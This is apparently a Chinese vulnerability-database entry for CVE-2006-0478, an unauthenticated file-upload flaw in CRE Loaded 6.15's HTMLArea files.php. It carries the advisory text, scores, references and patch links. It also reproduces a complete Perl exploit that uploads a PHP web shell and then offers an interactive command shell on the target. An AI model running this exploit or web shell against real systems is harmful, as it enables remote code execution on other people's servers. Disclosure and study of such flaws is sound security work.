CVE-2006-0478
CVSS7.5
发布时间 :2006-01-31 06:03:00
修订时间 :2011-03-07 21:30:08
NMCOE    

[原文]CRE Loaded 6.15 allows remote attackers to perform privileged actions, including uploading and creating arbitrary files, via a direct request to files.php. NOTE: the vendor states "The initial announcement of this risk was made on our website... and it included a patch which will close the vulnerability on all known 6.0x and 6.1x releases. We strongly encourage users of CRE Loaded 6.x, osCMax, and other users of osCommerce who have installed HTMLArea based WYSIWYG editors and Admin Access with Levels to modify thier installations at the earliest possible moment."


[CNNVD]CRE Loaded Files.PHP访问验证漏洞(CNNVD-200601-376)

        CRE Loaded 6.15访问验证漏洞,远程攻击者可以通过直接请求files.php执行具有特权的操作,包括上传和创建任意文件。注意:供应商声称"在我们的网站上最初已公布了此风险...并且网站上还提供了补丁程序,将用于关闭所有已知6.0x和6.1x发行版上的漏洞。我们强烈建议已安装基于HTMLArea的WYSIWYG编辑器和Admin Access with Levels的CRE Loaded 6.x、osCMax和其他osCommerce用户尽早修改安装"。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0478
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0478
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-376
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16415
(PATCH)  BID  16415
http://secunia.com/advisories/18648
(VENDOR_ADVISORY)  SECUNIA  18648
http://xforce.iss.net/xforce/xfdb/24377
(UNKNOWN)  XF  creloaded-files-auth-bypass(24377)
http://www.vupen.com/english/advisories/2006/0373
(UNKNOWN)  VUPEN  ADV-2006-0373
http://www.osvdb.org/22793
(UNKNOWN)  OSVDB  22793
http://www.attrition.org/pipermail/vim/2006-February/000527.html
(UNKNOWN)  VIM  20060203 vendor ack/fix: 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload (fwd)

- 漏洞信息

CRE Loaded Files.PHP访问验证漏洞
高危 访问验证错误
2006-01-31 00:00:00 2007-01-24 00:00:00
远程  
        CRE Loaded 6.15访问验证漏洞,远程攻击者可以通过直接请求files.php执行具有特权的操作,包括上传和创建任意文件。注意:供应商声称"在我们的网站上最初已公布了此风险...并且网站上还提供了补丁程序,将用于关闭所有已知6.0x和6.1x发行版上的漏洞。我们强烈建议已安装基于HTMLArea的WYSIWYG编辑器和Admin Access with Levels的CRE Loaded 6.x、osCMax和其他osCommerce用户尽早修改安装"。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Chain Reaction Edition CRE Loaded 6.1
        Chain Reaction Edition CRE Loaded 6.2
        http://creloaded.com/Downloads/d_op=getit/lid=172.html
        Chain Reaction Edition CRE Loaded 6.15
        Chain Reaction Edition CRE Loaded 6.2
        http://creloaded.com/Downloads/d_op=getit/lid=172.html
        Chain Reaction Edition CRE Loaded 6.0
        Chain Reaction Edition CRE Loaded 6.2
        http://creloaded.com/Downloads/d_op=getit/lid=172.html

- 漏洞信息 (1446)

creLoaded <= 6.15 (HTMLAREA) Automated Perl Exploit (EDBID:1446)
php webapps
2006-01-24 Verified
0 kaneda
N/A [点击下载]
#!/usr/bin/perl
#
# creLoaded <= 6.15 HTMLAREA automated perl exploit
# hacked up by kaneda <kaneda@blacksecurity.org>
#
# Rather simple exploit, but still an exploit nonetheless.  Attempts to upload php script and 
# utilise that to execute commands, and show off a fake shell.
#
# Can specify:
# 	* User-defined PHP script or one provided in this script (suits most occasions)
# 	* Additional variables to pass to PHP script after upload
# 	* HTTP proxy
#
# Read the (messy) code before use.
#
# Greets: nemo, mercy, riotact, zeroday, modem, phildo, gimmemylanta, rodjek, negz
#

print "creLoaded <= 6.15 HTMLAREA automated perl exploit\nhacked up by kaneda\n";

use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;
use Term::ReadLine;

my $baseurl = "/admin/htmlarea/popups/file/files.php";

my $status = getopts('s:p:a:');
if(@ARGV < 1) { die(usage()); }

my %vars, $response, $masterurl, $browser, $cmd;
$masterurl = @ARGV[0];
$browser = LWP::UserAgent->new;

if($opt_s) {
	print "[*] User-defined script '$opt_s' will be used instead of 'default'\n";
}

if($opt_p) {
	$browser->proxy(['http', 'https'] => $opt_p);
	print "[*] HTTP/HTTPS proxy set to $opt_p\n";
}

if($opt_a) {
	@tmp = split(",",$opt_a);
	foreach $tmpvar (@tmp) {
		@tmp2 = split("=",$tmpvar);
		$vars{$tmp2[0]} = $tmp2[1];
		print "[+] Adding variable '" . $tmp2[0] . "' with value '" . $tmp2[1] . "'\n";
	}
}

sub usage 
{
	print "usage: creloaded615.pl [-s/path/to/file.php] [-phostname:port] [-avarname1=value1,...,varname2=value2] URL\n\n";
	print "-a - additional variables i.e. -aaction=create,cid=12\n";
	print "-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080\n";
	print "-s - specify path to user-defined script instead of using default\n";
	print "URL - http://vuln/store\n\n";
	exit;
}

sub sendform 
{
	if($opt_G) {
		my $url = $masterurl . "?";
		# Non-issue, but could beautify the single line here at a later date.
		foreach $tmp (keys (%vars)) {
			$url .= "\&$tmp=" . $vars{$tmp};
		}
		$response = $browser->get($url);
		die "Failed to get!" unless defined $response;
	} else {
		$response = $browser->post($masterurl, \%vars);
		die "Failed to post!" unless defined $response;
	}
}

if(!$opt_s) {
	# Lazy.
	print "[*] Creating 'default' PHP script\n";
	$tmp = "<?php system(\$a); ?>";
	open(FILE, "> /tmp/default.php");
	print FILE $tmp;
	close(FILE);
	$opt_s = "/tmp/default.php";
}

open(FILE, "< $opt_s");
@content = <FILE>;
close(FILE);

if(!$vars{"dirPath"}) {
	print "[*] Setting upload path to $masterurl/images\n";
	$vars{"dirPath"} = "/../images/";
}
$tmp = $masterurl . $baseurl;
print "[*] Abusing creLOADED\n";
$browser->timeout(10);
$req = POST $tmp, Content_Type => 'form-data', Content => [ actions => "upload", dirPath => $vars{"dirPath"}, upload => [ $opt_s ] ];
$response = $browser->request($req);
$browser->timeout(180);
$term = Term::ReadLine->new('cre');

print "[*] Executing 'id' then spawning fake shell\n";
$masterurl = $masterurl . "/images/default.php";
$vars{"a"} = "id";
&sendform;
print $response->content;
while(1) {
	$prompt = "bash-2.05b\$ ";
	$tmp = $term->readline($prompt, "");
	$cmd = $tmp;
	
	if(($cmd eq "quit") || ($cmd eq "exit")) {
		exit;
	}

	$vars{"a"} = $cmd;
	&sendform;
	print $response->content;
}

# milw0rm.com [2006-01-24]
		

- 漏洞信息

22793
HTMLArea files.php Unauthenticated Arbitrary File Upload
Remote / Network Access Input Manipulation
Impact Unknown
Exploit Public

- 漏洞描述

HTMLArea contains a flaw that may allow a malicious user to execute arbitrary commands. The '/admin/htmlarea/popups/file/files.php' script is accessible without authentication, allowing a remote attacker to use this script to upload malicious PHP files and execute arbitrary code on the system.

- 时间线

2006-01-30 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue in HTMLArea. Upgrade to version 6.2 or higher, as it has been reported to fix this vulnerability. In addition, Chain Reaction Works, Inc. has released a patch for some older versions.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站